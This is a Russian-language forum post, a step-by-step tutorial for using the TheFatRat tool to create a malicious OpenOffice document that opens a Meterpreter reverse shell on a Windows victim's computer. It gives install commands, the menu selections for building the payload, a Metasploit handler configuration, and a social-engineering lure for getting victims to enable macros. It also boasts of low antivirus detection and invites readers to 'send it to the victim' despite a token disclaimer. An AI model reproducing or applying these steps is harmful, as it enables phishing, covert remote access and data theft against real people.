TheFatRat взлом Windows через OpenOffice

Sasha3I8I2

Не сливаю с STF
Pro Member
Сообщения
79
Оценка реакций
40
Сегодня мы поговорим о том, как с помощью инструмента TheFatRat можно взломать любой компьютер на Windows.

OpenOffice -это бесплатная альтернатива Microsoft Office. Не так много, кто использует эту программу, но в небольших фирмах, университетах вынуждены пользоваться именно ей. В связи с тем, что нет бюджета на покупку официальной лицензии Microsoft, а нелицензионной пользоваться запрещено.
Не используйте это в корыстных целях, чтобы рассылать вирус по почтам фирм, людей, взломать и получить всю нужную, интересную информацию. Здесь все представлено лишь для ознакомления.
The Fat Rat - Backdoor для удаленного доступа. Использовать мы его будем на Kali Linux.
Установка


Код:
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat/
bash setup.sh
Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:

Код:
fatrat
Можете ознакомиться и протестировать все приведенные способы взлома. Но те, что подписаны FUD, уже детектятся 10-20 антивирусами, в том числе и вирус Microsoft Office.

Создание вируса

Посмотреть вложение 8744

Вводим
Код:
7
Посмотреть вложение 8745

Вводим

Код:
4
и ваш IPV4 адрес, любой неиспользуемый порт, затем название документа
Посмотреть вложение 8747
Выбираем полезную нагрузку, например, 6.

Посмотреть вложение 8748

Все, ваш файл готов по указанному пути. Отправляйте жертве.

Посмотреть вложение 8749

Взлом
Далее мы должны подождать пока сессия откроется. Используем metasploit.
Код:
msfconsole
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Посмотреть вложение 8750

Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter.

Рассылая письмом под видом важного документа, необходимо использовать СИ, чтобы разрешили запуск макросов. К примеру, "в документе приведены расчеты за каждый месяц 2019 года. Для автоматического запуска расчетов необходимо разрешить выполнение макросов. "
Ну и все. А дальше делать в консоли можно все, что захотите. Скачивайте, скриньте итп.
Детект вируса 2/38